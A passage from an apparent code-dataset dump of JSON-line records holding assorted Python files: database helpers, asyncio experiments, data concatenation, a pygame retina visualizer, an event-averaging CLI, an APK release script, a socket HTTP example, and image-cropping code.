= client\n\n def getFtModel(self, id):\n try:\n m = self.client.ft.models.find_one(filter={\"_id\":ObjectId(id)})\n except:\n logging.error(f'INVALID MODEL ID {id}')\n if m:\n return m\n \n def getFtDatasets(self):\n return self.client.datasets\n def getFtStats(self):\n return self.client.stats\n \n def writeModel(self,aimodel):\n model = {\"model\" :\n { \n \"name\" : aimodel.name,\n \"version\" : aimodel.version,\n \"supervised\": aimodel.supervised,\n \"ft\": aimodel.ft,\n \"quantized\": aimodel.quantized,\n \"filepath\": aimodel.filepath,\n \"splitAt\" : aimodel.splitAt,\n \"bias\" : aimodel.bias,\n \"ngrams\" : aimodel.ngrams,\n \"learningRate\" : aimodel.learningRate,\n \"epochs\": aimodel.epochs,\n \"label\" : aimodel.label,\n \"method\": aimodel.method,\n \"dataset\" : aimodel.dataset.toDict() \n }\n }\n self.client.ft.models.find_one_and_replace(filter=model, replacement=model, upsert=True)\n \n def writeStats(self,stat):\n \n self.client.ft.stats.insert_one(stat)\n def writeDataSet(self,dataset):\n self.client.datasets.insert_one(dataset)\n \n \n\n","sub_path":"tina-worker/app/ft/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"244384017","text":"import asyncio\n\n\nclass Message:\n def __init__(self, id, kind='default', ok=True):\n self.id = id\n self.kind = kind\n self.ok = ok\n\nclass Subscriber:\n def __init__(self):\n self.queue = asyncio.Queue()\n self.active = True\n\n def send(self, msg):\n pass\n\n async def receive(self):\n await self.queue.get()\n\nclass Hub:\n def __init__(self):\n self.subscribers = []\n\n def subscribe(self, subscriber):\n self.subscribers.append(subscriber)\n\n async def send(self, msg):\n asyncio.create_task(self.publish(msg))\n\n async def publish(self, msg):\n for subscriber in self.subscribers:\n await subscriber.send(msg)\n\nhub = Hub()\n\nclass PostSubscriber(Subscriber):\n def __init__(self, id):\n super().__init__()\n self.id = id\n\n async def send(self, msg):\n print('put in queue')\n if msg.id != self.id:\n return\n await self.queue.put(msg)\n\nclass Runner:\n def run(self, task):\n #asyncio.run(coro, *, debug=False)\n #asyncio.run(self.main, debug=True)\n asyncio.run(task, debug=True)\n #loop = asyncio.get_event_loop()\n #loop.run_until_complete(task)\n #loop.run_forever(task)\n\n async def main(self):\n print('hello')\n\n\ntask = Task()\nrunner = Runner()\nrunner.run(task)\n#loop = asyncio.get_event_loop()\n#loop.run_until_complete(task)","sub_path":"experiments/exp_runner.py","file_name":"exp_runner.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"152380490","text":"import pandas as pd\nimport numpy as np\n\n\ndef call_file(year):\n path = '/Users/nathanoliver/Desktop/Python/US_Energy/csv/data_201' + \\\n str(year) + '.csv'\n data = pd.read_csv(path)\n return pd.DataFrame(data)\n\n\ndef concat(df1, df2):\n return pd.concat((df1, df2), axis='index')\n\n\ndf1 = call_file(1)\ndf2 = call_file(2)\n\nprint(len(df1))\nprint(len(df2))\n\ndf = pd.concat((df1, df2), axis='index')\n\nfor i in range(3, 10):\n df2 = call_file(i)\n df = concat(df, df2)\n print(i)\n\ndf.to_csv(\n '/Users/nathanoliver/Desktop/Python/US_Energy/csv/data_final.csv', index=False)\n","sub_path":"py/00_concat_files.py","file_name":"00_concat_files.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"340427931","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass ScopeModel(nn.Module):\n def __init__(self, scope_len, num_class):\n super(ScopeModel, self).__init__()\n\n\n # scope_len = win_len / 2\n self.former = nn.Parameter(torch.ones(scope_len, 1), requires_grad=True)\n self.latter = nn.Parameter(torch.ones(scope_len, 1), requires_grad=True)\n\n # self.former = nn.Parameter(torch.linspace(0, 1, scope_len).view(-1,1), requires_grad=True)\n # self.latter = nn.Parameter(torch.linspace(1, 0, scope_len).view(-1,1), requires_grad=True)\n\n\n def forward(self, inputs):\n\n # size n , win_lne/2, num_classes\n input_former = inputs[0]\n\n # size n , win_lne/2, num_classes\n input_latter = inputs[1]\n\n # size n , win_lne/2, num_classes\n input_former = input_former*self.former\n input_latter = input_latter*self.latter\n\n # input_former = self.former(input_former)\n # input_latter = self.latter(input_latter)\n\n y_pred = input_former+input_latter\n\n\n return y_pred","sub_path":"har_pytorch/model_innv.py","file_name":"model_innv.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"554778396","text":"# Write a program to count the total number of bases\n# in all of the sequences in the file\n# /usr/coursehome/dalke/ambiguous_sequences.seq\n# and the total number of each base found, in order\n# \n# File has 24789 bases\n# A = 6504\n# B = 1\n# C = 5129\n# D = 1\n# G = 5868\n# K = 1\n# M = 1\n# N = 392\n# S = 2\n# R = 3\n# T = 6878\n# W = 1\n# Y = 8\n\nmain = \"\"\nfor seq in open(\"Chapter Specification/sequence.txt\"):\n seq = seq.rstrip()\n main = main+seq;\n\nseq = main\nprint(\"Sequence has\", len(seq), \"bases\")\ncounts = {}\nfor base in seq:\n counts[base] = counts.get(base, 0) + 1\n\nkeys = counts.keys()\nkeys = sorted(keys)\nfor i in keys:\n print(i, \"=\", counts[i])\n","sub_path":"3-2/CSE 3210 (Artificial Intelligence)/Lab Works by '15/Python All/23. Dictionaries - Exercise - 4.py","file_name":"23. Dictionaries - Exercise - 4.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"178483582","text":"from Constants import *\n\nclass Visualizer:\n \n def __init__(self, retina, visualization_width=1000, visualization_height=1000,\n visualization_background_color=pygame.Color(255,255,255), controls_width=250, \n controls_background_color=pygame.Color(245,245,245)):\n \n\n \n self.visualization_background_color = visualization_background_color\n self.controls_background_color = controls_background_color\n \n # The screen real estate (pixels) used for displaying visuals\n self.visualization_width = visualization_width\n self.visualization_height = visualization_height\n self.visualization_size = (self.visualization_width, self.visualization_height)\n self.visualization_position = (0, 0)\n \n # The screen real estate (pixels) used for adding controls\n self.controls_width = controls_width\n self.controls_height = visualization_height\n self.controls_size = (self.controls_width, self.controls_height)\n self.controls_position = (self.visualization_width, 0)\n \n # Total screen size for the pygame window\n self.screen_width = self.visualization_width + self.controls_width\n self.screen_height = self.visualization_height\n self.screen_size = (self.screen_width, self.screen_height)\n \n # Calculate the scaling from retina to the visualization size\n self.retina = retina\n self.visualization_scale = self.calculateVisualizationScaling() \n # Load and convert a bunch of retina stuff to display coordinates\n self.preloadRetina()\n \n # Start pygame \n pygame.init()\n \n # Create the pygame surfaces\n self.screen_surface = pygame.display.set_mode(self.screen_size)\n self.visualization_surface = pygame.Surface(self.visualization_size)\n self.controls_surface = pygame.Surface(self.controls_size)\n self.screen_surface.fill((255,255,255)) \n \n # Create a set of linked buttons to determine the visualization type\n visualization_types = [\"Stimulus\", \"Input Weights\", \"Soma Placement\", \"Activity\"]\n buttons = []\n width, height = 200, 40\n dy = 40 + 20\n x, y = int(self.controls_width/2.0-width/2.0), dy\n for vis_type in visualization_types:\n button = Button(self.controls_surface, text=vis_type, name=vis_type,\n x=x, y=y)\n y += dy\n buttons.append(button) \n self.visualization_type_button_group = LinkedButtons(buttons)\n \n # Create a set of linked buttons to determine the cell type\n cell_types = [\"Cone\", \"Horizontal\", \"On Bipolar\", \"Off Bipolar\", \"On Starburst\", \"Off Starburst\"]\n buttons = []\n width, height = 200, 40\n dy = 40 + 20\n x, y = int(self.controls_width/2.0-width/2.0), 400\n for cell_type in cell_types:\n button = Button(self.controls_surface, text=cell_type, name=cell_type,\n x=x, y=y)\n y += dy\n buttons.append(button) \n self.cell_type_button_group = LinkedButtons(buttons)\n \n # Create a set of linked buttons to change the timestep\n width = 90\n height = 40 \n x1 = button.button_rectangle.left\n x2 = button.button_rectangle.right - width\n y1 = 800\n y2 = 800 \n left = Button(self.controls_surface, text=\"<-\", name=\"Left\", \n x=x1, y=y1, width=width, height=height)\n x, y = x+30, 800\n right = Button(self.controls_surface, text=\"->\", name=\"Right\", \n x=x2, y=y2, width=width, height=height)\n self.direction_arrows_button_group = LinkedButtons([left, right])\n \n self.mainloop()\n \n \n \n def mainloop(self): \n running = True\n clock = pygame.time.Clock()\n while running:\n mouse_x, mouse_y = pygame.mouse.get_pos()\n mouse_click = False \n \n for event in pygame.event.get():\n if event.type == QUIT:\n running = False\n else:\n if event.type == MOUSEBUTTONUP:\n if event.button == 1:\n mouse_click = True\n \n # Hack to allow LEFT/RIGHT arrows to simulate button press\n if pygame.key.get_pressed()[K_LEFT]: \n self.timestep -= 1\n if self.timestep < 0: self.timestep = self.end_timestep\n elif pygame.key.get_pressed()[K_RIGHT]: \n self.timestep += 1\n if self.timestep > self.end_timestep: self.timestep = 0\n \n buttons_pressed = self.updateControlSurface(mouse_x, mouse_y, mouse_click)\n self.updateVisualizationSurface(buttons_pressed, mouse_x, mouse_y)\n \n pygame.display.update()\n clock.tick(60)\n \n \n \n def preloadRetina(self):\n \n r = self.retina \n \n self.cone_layer = r.cone_layer\n self.horizontal_layer = r.horizontal_layer\n self.on_bipolar_layer = r.on_bipolar_layer\n self.off_bipolar_layer = r.off_bipolar_layer\n self.on_starburst_layer = r.on_starburst_layer\n self.off_starburst_layer = r.off_starburst_layer\n \n self.cone_color = r.cone_color\n self.horizontal_color = r.horizontal_color\n self.on_bipolar_color = r.on_bipolar_color\n self.off_bipolar_color = r.off_bipolar_color\n self.on_starburst_color = r.on_starburst_color\n self.off_starburst_color = r.off_starburst_color\n \n self.cone_color_deselected = lerpColors(self.cone_color, self.visualization_background_color, 0.85)\n self.horizontal_color_deselected = lerpColors(self.horizontal_color, self.visualization_background_color, 0.85)\n self.on_bipolar_color_deselected = lerpColors(self.on_bipolar_color, self.visualization_background_color, 0.85)\n self.off_bipolar_color_deselected = lerpColors(self.off_bipolar_color, self.visualization_background_color, 0.85)\n self.on_starburst_color_deselected = lerpColors(self.on_starburst_color, self.visualization_background_color, 0.85)\n self.off_starburst_color_deselected = lerpColors(self.off_starburst_color, self.visualization_background_color, 0.85)\n \n self.cone_activities = r.cone_activities\n self.horizontal_activities = r.horizontal_activities\n self.on_bipolar_activities = r.on_bipolar_activities\n self.off_bipolar_activities = r.off_bipolar_activities\n self.on_starburst_activities = r.on_starburst_activities\n self.off_starburst_activities = r.off_starburst_activities\n \n self.cone_activity_bounds = r.activity_bounds[0]\n self.horizontal_activity_bounds = r.activity_bounds[1]\n self.on_bipolar_activity_bounds = r.activity_bounds[2]\n self.off_bipolar_activity_bounds = r.activity_bounds[3]\n self.on_starburst_activity_bounds = r.activity_bounds[4]\n self.off_starburst_activity_bounds = r.activity_bounds[5]\n \n self.colormap = [[-1.0, pygame.Color(0,0,255)], [0.0, pygame.Color(0,0,0)], [1.0, pygame.Color(255,0,0)]]\n \n self.timestep = 0\n self.end_timestep = len(self.cone_activities) - 1 \n \n def visualizeCellPlacement(self, surface, cell_type, scale=1.0):\n if cell_type == None:\n self.on_starburst_layer.draw(surface, scale=scale)\n self.off_starburst_layer.draw(surface, scale=scale)\n self.on_bipolar_layer.draw(surface, scale=scale) \n self.off_bipolar_layer.draw(surface, scale=scale) \n self.horizontal_layer.draw(surface, inflate_radius=1.0, scale=scale) \n self.cone_layer.draw(surface, scale=self.visualization_scale)\n else: \n self.on_starburst_layer.draw(surface, color=self.on_starburst_color_deselected, scale=scale)\n self.off_starburst_layer.draw(surface, color=self.off_starburst_color_deselected, scale=scale)\n self.on_bipolar_layer.draw(surface, color=self.on_bipolar_color_deselected, scale=scale) \n self.off_bipolar_layer.draw(surface, color=self.off_bipolar_color_deselected, scale=scale) \n self.horizontal_layer.draw(surface, color=self.horizontal_color_deselected, inflate_radius=1.0, scale=scale) \n self.cone_layer.draw(surface, color=self.cone_color_deselected, scale=self.visualization_scale)\n if cell_type == \"Cone\":\n self.cone_layer.draw(surface, scale=self.visualization_scale)\n elif cell_type == \"Horizontal\":\n self.horizontal_layer.draw(surface, scale=self.visualization_scale)\n elif cell_type == \"On Bipolar\":\n self.on_bipolar_layer.draw(surface, scale=scale) \n elif cell_type == \"Off Bipolar\":\n self.off_bipolar_layer.draw(surface, scale=scale) \n elif cell_type == \"On Starburst\":\n self.on_starburst_layer.draw(surface, scale=scale)\n elif cell_type == \"Off Starburst\":\n self.off_starburst_layer.draw(surface, scale=scale) \n \n def updateVisualizationSurface(self, buttons_pressed, mouse_x, mouse_y):\n scale = self.visualization_scale\n surface = self.visualization_surface\n \n surface.fill(self.visualization_background_color)\n \n vis_button_pressed = buttons_pressed[0]\n cell_button_pressed = buttons_pressed[1]\n \n if not(vis_button_pressed==None):\n vis_type = vis_button_pressed.name\n \n cell_type = None\n if cell_button_pressed != None: \n cell_type = cell_button_pressed.name \n \n if vis_type == \"Soma Placement\":\n pygame.display.set_caption(vis_type + \" \" + str(cell_type))\n self.visualizeCellPlacement(surface, cell_type, scale)\n \n elif vis_type == \"Activity\":\n if cell_type != None:\n self.retina.loadPast(self.timestep)\n self.retina.drawLayerActivity(surface, cell_type, self.colormap, scale)\n pygame.display.set_caption(vis_type + \" \" + str(cell_type) + \" \" + str(self.timestep))\n \n self.screen_surface.blit(self.visualization_surface, self.visualization_position)\n \n \n def updateControlSurface(self, mouse_x, mouse_y, mouse_click):\n # Shift the mouse coordinates into the coordinate system of the controls surface \n mouse_x -= self.controls_position[0]\n mouse_y -= self.controls_position[1]\n \n # Erase the surface\n self.controls_surface.fill(self.controls_background_color)\n \n # Update the buttons\n self.visualization_type_button_group.update(mouse_x, mouse_y, mouse_click)\n self.cell_type_button_group.update(mouse_x, mouse_y, mouse_click)\n self.direction_arrows_button_group.update(mouse_x, mouse_y, mouse_click)\n \n # Draw the buttons\n self.visualization_type_button_group.draw()\n self.cell_type_button_group.draw()\n self.direction_arrows_button_group.draw()\n \n # Draw the control surface to the screen\n self.screen_surface.blit(self.controls_surface, self.controls_position)\n \n # Hack to reset the directional arrows after using them to change the current timestep\n direction_button_pressed = self.direction_arrows_button_group.getPressedButton()\n if direction_button_pressed == None:\n pass\n elif direction_button_pressed.name == \"Left\":\n self.timestep -= 1\n if self.timestep < 0: self.timestep = self.end_timestep\n elif direction_button_pressed.name == \"Right\":\n self.timestep += 1\n if self.timestep > self.end_timestep: self.timestep = 0\n self.direction_arrows_button_group.resetButtons(mouse_x, mouse_y, False)\n \n # Determine if any buttons have been pressed\n vis_button_pressed = self.visualization_type_button_group.getPressedButton()\n cell_button_pressed = self.cell_type_button_group.getPressedButton()\n buttons_pressed = [vis_button_pressed, cell_button_pressed]\n \n return buttons_pressed\n \n \n \n def calculateVisualizationScaling(self): \n width_scale = self.visualization_width / float(self.retina.grid_width)\n height_scale = self.visualization_height / float(self.retina.grid_height)\n return min(width_scale, height_scale)\n \n \n\"\"\"\nLinkedButtons are a group of buttons where at maximum one can be depressed at a time\n\"\"\" \nclass LinkedButtons:\n def __init__(self, buttons):\n self.buttons = buttons\n self.number_buttons = len(buttons)\n \n def getPressedButton(self): \n for button in self.buttons:\n if button.isPressed(): return button \n return None\n \n def draw(self):\n for button in self.buttons:\n button.draw()\n \n def resetButtons(self, mouse_x, mouse_y, mouse_clicked):\n for button in self.buttons:\n button.reset()\n button.update(mouse_x, mouse_y, mouse_clicked)\n \n \n def update(self, mouse_x, mouse_y, mouse_clicked):\n # Update the buttons and stop if a button just became pressed\n for button_index in range(self.number_buttons):\n button = self.buttons[button_index]\n just_pressed = button.update(mouse_x, mouse_y, mouse_clicked)\n if just_pressed: \n pressed_button_index = button_index\n break\n \n # If a button was just pressed, make sure all the other buttons in the\n # group are not pressed \n if just_pressed:\n for button_index in range(self.number_buttons):\n if button_index != pressed_button_index:\n button = self.buttons[button_index]\n button.reset()\n button.update(mouse_x, mouse_y, False)\n \n\"\"\"\nButton is a little button class that has a couple visual flourishes\n\"\"\"\nclass Button:\n\n def __init__(self, display, x=100, y=100, width=200, height=50, \n button_normal_color=(0,197,234), \n button_pressed_color=(0,149,219),\n button_hover_color=(0,180,229),\n button_shadow_color=(13,105,146),\n text=\"Test String\", text_color=(255,255,255), fontName=None,\n fontSize=24, antialias=True, name=\"Test\"):\n \n self.display = display\n \n self.name = name\n \n self.button_rectangle = pygame.Rect(x, y, width, height) \n \n self.font = pygame.font.Font(fontName, fontSize)\n self.label = self.font.render(text, antialias, text_color)\n self.label_rectangle = self.label.get_rect()\n self.label_rectangle.center = self.button_rectangle.center\n \n self.button_normal_color = pygame.Color(button_normal_color[0], button_normal_color[1], button_normal_color[2])\n self.button_hover_color = pygame.Color(button_hover_color[0], button_hover_color[1], button_hover_color[2])\n self.button_pressed_color = pygame.Color(button_pressed_color[0], button_pressed_color[1], button_pressed_color[2])\n self.button_shadow_color = pygame.Color(button_shadow_color[0], button_shadow_color[1], button_shadow_color[2])\n self.button_color = self.button_normal_color\n \n self.button_pressed = False\n \n def reset(self):\n self.button_pressed = False\n def isPressed(self):\n return self.button_pressed\n \n def draw(self):\n # Draw the button\n pygame.draw.rect(self.display, self.button_color, self.button_rectangle)\n \n # Draw the button shadow if necessary\n if self.button_pressed: pygame.draw.rect(self.display, self.button_shadow_color, self.button_rectangle, 1)\n \n # Draw the text on top\n self.display.blit(self.label, self.label_rectangle)\n \n \n def update(self, mouse_x, mouse_y, mouse_click):\n mouse_within_button = self.button_rectangle.collidepoint(mouse_x, mouse_y)\n \n if self.button_pressed:\n if mouse_within_button and mouse_click:\n self.button_color = self.button_normal_color\n self.button_pressed = False\n else:\n self.button_color = self.button_pressed_color\n \n elif self.button_rectangle.collidepoint(mouse_x, mouse_y):\n if mouse_click:\n self.button_color = self.button_pressed_color\n self.button_pressed = True\n return True\n else:\n self.button_color = self.button_hover_color\n \n else:\n self.button_color = self.button_normal_color\n \n return False\n \n \n \n\"\"\"\nLinearly interpolate between color1 and color2\n\"\"\"\ndef lerpColors(color1, color2, fraction):\n r = color1.r + fraction * (color2.r - color1.r)\n g = color1.g + fraction * (color2.g - color1.g)\n b = color1.b + fraction * (color2.b - color1.b)\n return pygame.Color(int(r),int(g),int(b))\n\n\"\"\"\nLinear distance between two points\n\"\"\"\ndef linearDistance(x1, y1, x2, y2):\n return ((x2-x1)**2.0 + (y2-y1)**2.0)**0.5\n\n\n","sub_path":"NewVisualizer.py","file_name":"NewVisualizer.py","file_ext":"py","file_size_in_byte":18104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"243413257","text":"#!/bin/python\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu May 29 09:09:14 2019\r\n@author: skondaveeti\r\n\"\"\"\r\nimport json\r\nimport datetime\r\nimport os\r\nimport sys\r\nimport argparse\r\n\r\n\r\nclass unbabel_cli:\r\n\r\n def __init__(self):\r\n self.json_file = None\r\n self.ws = None\r\n\r\n def is_valid_file(self, parser, arg):\r\n \"\"\"\r\n Validate the input file\r\n params :\r\n parser : ArgumentParser Handle ==> ArgumentParser\r\n arg : string ==> Input file name.\r\n return :\r\n an open file handle\r\n \"\"\"\r\n if not os.path.exists(arg):\r\n parser.error(\"The file %s does not exist!\" % arg)\r\n else:\r\n return open(arg, 'r') # return an open file handle\r\n\r\n def validate_event(self, event):\r\n \"\"\"\r\n validate event having the below mandatory keys:\r\n - duration\r\n - event_name and is set to translation_delivered\r\n - timestamp\r\n params:\r\n event : dict\r\n return :\r\n True/False\r\n \"\"\"\r\n required = ['event_name', 'duration', 'timestamp']\r\n for elt in required:\r\n if elt not in event.keys():\r\n return False\r\n if event['event_name'] != 'translation_delivered':\r\n return False\r\n return True\r\n\r\n def validate_on_win_size(self, date, event_date, window_size=10):\r\n \"\"\"\r\n validate the event on basis of Window Size.\r\n params:\r\n date : current date\r\n event_date : date from the list of events\r\n return :\r\n True/False\r\n True : if difference between date and event_date is <= window_size\r\n False : if not\r\n \"\"\"\r\n window_size_delta = datetime.timedelta(minutes=window_size)\r\n if (date - event_date).days < 0:\r\n return False\r\n return (date - event_date) <= window_size_delta\r\n\r\n def compute_ma_time(self, events, frequency=1, window_size=10):\r\n \"\"\"\r\n Count for each 'frequency' the average delivery time of 'events' for\r\n the past 'window_size' minutes\r\n params :\r\n events : list ==> sorted events list\r\n frequency : int ==> minutes\r\n window_size : int ==> last X minutes\r\n return :\r\n list of dict\r\n \"\"\"\r\n cls_ub = unbabel_cli()\r\n frequency_delta = datetime.timedelta(minutes=frequency)\r\n start_time = datetime.datetime.strptime(events[0]['timestamp'], '%Y-%m-%d %H:%M:%S.%f').replace(second=0,\r\n microsecond=0)\r\n end_time = datetime.datetime.strptime(events[len(events) - 1]['timestamp'], '%Y-%m-%d %H:%M:%S.%f').replace(\r\n second=0, microsecond=0) + frequency_delta\r\n date = start_time\r\n data = []\r\n while date <= end_time:\r\n N = 0\r\n cum_sum = 0\r\n for idx, event in enumerate(events, 1):\r\n if not cls_ub.validate_event(event):\r\n raise unbabel_cli_error('%s is not a valid event entry' % event)\r\n event_date = datetime.datetime.strptime(event['timestamp'], '%Y-%m-%d %H:%M:%S.%f')\r\n if cls_ub.validate_on_win_size(date, event_date, window_size):\r\n N += 1\r\n cum_sum += event['duration']\r\n if N:\r\n data.append({'date': str(date), 'average_delivery_time': cum_sum / float(N)})\r\n else:\r\n data.append({'date': str(date), 'average_delivery_time': 0})\r\n date += frequency_delta\r\n # Writes the output to output.txt file\r\n f = open(\"output.txt\", \"w+\")\r\n for i in range(len(data)):\r\n f.write(str(data[i]) + \"\\n\")\r\n # Writes the output to data.json, if needed in JSON Format.\r\n with open('data.json', 'w') as outfile:\r\n json.dump(data, outfile)\r\n\r\n def exit_requirement_error(self):\r\n \"\"\"\r\n Utility function to display on requirement mismatch error.\r\n \"\"\"\r\n requirement_error = \"\"\"Requirements :: \r\n must run on python 3.6\r\n Execution Format ::\r\n unbabel_cli --input_file (filename) --window_size (timeframe)\r\n filename and timeframe are required\r\n timeframe must be an integer\r\n use --help to print this message\r\n \"\"\"\r\n print(requirement_error)\r\n sys.exit(2)\r\n\r\n def main_func(self, args):\r\n \"\"\"\r\n Main Function which loads the event data, sort the data and compute the moving average time and writes to\r\n data.json\r\n params :\r\n args : ArgumentParser Handle ==> Parsed input arguments.\r\n \"\"\"\r\n # Get data and add it to the running counter\r\n self.json_file = args.input_file.name\r\n self.ws = args.window_size\r\n if not os.path.isfile(self.json_file):\r\n raise unbabel_cli_error('File Does not exist')\r\n events = [json.loads(line) for line in open(self.json_file, 'r')]\r\n events = sorted(events, key=lambda k: datetime.datetime.strptime(k['timestamp'], '%Y-%m-%d %H:%M:%S.%f'))\r\n cl_unbabel.compute_ma_time(events, window_size=self.ws)\r\n\r\n\r\nclass unbabel_cli_error(Exception):\r\n pass\r\n\r\n\r\nif __name__ == '__main__':\r\n # Get arguments from the command line\r\n cl_unbabel = unbabel_cli()\r\n try:\r\n parser = argparse.ArgumentParser(\r\n description='command line application that parses a stream of events and produces an aggregated output.')\r\n parser.add_argument('--input_file', type=lambda x: cl_unbabel.is_valid_file(parser, x), required=True,\r\n help='event log file Path {Ex:: events.json}')\r\n parser.add_argument('--window_size', type=int, required=True,\r\n help='number representing window size (in minutes)')\r\n args = parser.parse_args()\r\n cl_unbabel.main_func(args)\r\n except:\r\n cl_unbabel.exit_requirement_error()\r\n","sub_path":"unbabel_cli.py","file_name":"unbabel_cli.py","file_ext":"py","file_size_in_byte":6329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"469564185","text":"# coding=utf-8\nimport shutil\nimport sys\nimport os\nimport subprocess\nimport datetime\nimport re\nimport getopt\nimport time\n\n\nclass Options:\n def __init__(self):\n self.product_name = None\n self.project_name = None\n\nOPTIONS = Options()\n\n\ndef handle_data(argv):\n try:\n options, args = getopt.getopt(argv, \"p:j:\")\n except getopt.GetoptError:\n sys.exit(2)\n\n for name, value in options:\n if name in \"-p\":\n OPTIONS.product_name = value\n if name in \"-j\":\n OPTIONS.project_name = value\n\n\ndef release_apk():\n apks_name = os.listdir(\"/var/jenkins_home/APK/APK_FAST_RELEASE/APK\")\n for apk in apks_name:\n src = \"/var/jenkins_home/APK/APK_FAST_RELEASE/APK/{0}\".format(apk)\n dst = apk_release_path + \"/\" + apk + \"/\" + baseline\n if not os.path.exists(apk_release_path + \"/\" + apk):\n os.makedirs(apk_release_path + \"/\" + apk)\n shutil.copytree(src, dst)\n with open(dst + \"/time.txt\", 'w') as f:\n f.write(\"time\")\n os.remove(dst + \"/time.txt\")\n print('##APK:{0}; 已经发布到:{1}'.format(apk, dst.replace('/mnt','\\\\\\\\10.250.115.51').replace('/','\\\\')))\n\n\ndef release_indus():\n src = r\"/var/jenkins_home/APK/APK_FAST_RELEASE/APK\"\n dst = r\"{0}/indus/{1}\".format(apk_release_path, baseline)\n shutil.copytree(src, dst)\n print('##Indus:已经发布到{0}'.format(dst.replace('/mnt','\\\\\\\\10.250.115.51').replace('/','\\\\')))\n\n\nif __name__ == '__main__':\n handle_data(sys.argv[1:])\n\n p = re.compile('.*(\\(.*\\))')\n m = re.match(p, OPTIONS.product_name)\n if m is not None:\n OPTIONS.product_name = OPTIONS.product_name.replace(m.group(1), '')\n\n zip_path = \"/var/jenkins_home/APK/APK_FAST_RELEASE/APK.zip\"\n ip = \"/mnt\"\n apk_release_path = \"{0}/APK_Release_Version/03-product/{1}\".format(ip, OPTIONS.product_name)\n\n baseline = datetime.datetime.now().strftime(\"%Y.%m.%d_%H.%M\")\n\n\n if not os.path.exists(zip_path):\n print(\"#未上传包含所有APK的zip压缩包,请上传!!\")\n sys.exit(1)\n print(\"##开始解压Zip压缩包...\")\n if os.path.exists(\"/var/jenkins_home/APK/APK_FAST_RELEASE/APK\"):\n shutil.rmtree(\"/var/jenkins_home/APK/APK_FAST_RELEASE/APK\")\n\n if not os.path.exists(\"/var/jenkins_home/APK/APK_FAST_RELEASE/APK\"):\n os.makedirs(\"/var/jenkins_home/APK/APK_FAST_RELEASE/APK\")\n\n\n unzip_cmd = \"unzip /var/jenkins_home/APK/APK_FAST_RELEASE/APK.zip -d /var/jenkins_home/APK/APK_FAST_RELEASE/APK\"\n os.system(unzip_cmd)\n\n time.sleep(5)\n \n if OPTIONS.project_name == \"indus\":\n release_indus()\n else:\n release_apk()\n\n\n time.sleep(5)\n shutil.rmtree(\"/var/jenkins_home/APK/APK_FAST_RELEASE/APK\")","sub_path":"script/ApkRelease/apk_fast_release.py","file_name":"apk_fast_release.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"469764565","text":"# Tcp编程测试\nimport socket\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.connect(('www.sina.com.cn',80))\ns.send(b'GET / HTTP/1.1\\r\\nHost: www.sina.com.cn\\r\\nConnection: close\\r\\n\\r\\n')\nbuffer=[]\nwhile True:\n d=s.recv(1024)\n if d:\n buffer.append(d)\n else:\n break\ndata=b''.join(buffer)\ns.close()\nheader,html = data.split(b'\\r\\n\\r\\n',1)\nprint(header.decode('utf-8'),html.decode('utf-8'))\nwith open('sina.html','wb') as f:\n f.write(html)\n'''\n# 输出结果如下:\n# ==============================\nD:\\GitHub\\PythonLearnProject\\网络编程>python Tcp.py\nHTTP/1.1 302 Moved Temporarily\nServer: nginx\nDate: Tue, 14 Aug 2018 02:34:31 GMT\nContent-Type: text/html\nContent-Length: 154\nConnection: close\nLocation: https://www.sina.com.cn/\nX-Via-CDN: f=edge,s=ctc.ningbo.ha2ts4.104.nb.sinaedge.com,c=182.138.101.45;\nX-Via-Edge: 15342140710462d658ab6eebeee7305077e44\n\n302 Found\n\n

    302 Found

    \n
    nginx
    \n\n\n# ==============================\n'''","sub_path":"网络编程/Tcp.py","file_name":"Tcp.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"151461712","text":"import cv2\nimport os\nfrom os import listdir, getcwd\nfrom os.path import join\nfrom PIL import Image\n\nwd = getcwd()\n\ndef draw_bbox(img_file, bbox=None, out_pic=None):\n img = Image.open(img_file)\n img.crop((bbox[0], bbox[1], bbox[2], bbox[3])).save(out_pic, \"JPEG\", quality=100)\n print('save into',out_pic)\n \n\ndef draw_all_bboxes(result,out_image_folder=None,out_label_folder=None):\n with open(result, 'r') as f:\n results_list = f.readlines()\n count=0\n for line in results_list:\n line=line.split()\n if (float(line[1])>0.95):\n count=count+1\n image_file=os.path.join(wd,'images',line[0]+'.jpg')\n bbox=[int(float(line[2])), int(float(line[3])), int(float(line[4])), int(float(line[5]))]\n \n #print (line)\n #print(bbox)\n out_pic= os.path.join(out_image_folder,line[0]+'_num'+str(count)+'.jpg')\n out_label=os.path.join(out_label_folder,line[0]+'_num'+str(count)+'.txt')\n draw_bbox(image_file, bbox, out_pic)\n label='0 0'\n label_out_file = open(out_label, 'w')\n label_out_file.write(label)\n print('save into',out_label)\n label_out_file.close()\n\n\n\n\nif __name__ == \"__main__\":\n result = \"./results/results.txt\"\n out_image_folder = \"./worker_img/\"\n out_label_folder='./worker_labels/'\n draw_all_bboxes(result,out_image_folder,out_label_folder)\n\n","sub_path":"draw_bbox.py","file_name":"draw_bbox.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"225947033","text":"import numpy as np\nfrom PIL import Image\nimport os\nimport cv2\n\n\ndef rescale(img, 